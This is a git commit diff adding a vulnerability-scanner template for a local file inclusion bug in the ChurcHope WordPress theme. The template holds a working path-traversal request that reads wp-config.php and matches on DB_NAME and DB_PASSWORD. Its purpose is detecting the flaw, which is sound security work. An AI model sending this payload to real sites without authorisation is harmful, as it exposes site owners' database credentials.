Create churchope-application-lfi.yaml
parent
0796ba6ff3
commit
7294e5577c
|
@ -0,0 +1,28 @@
|
|||
id: churchope-application-lfi
|
||||
|
||||
info:
|
||||
name: ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue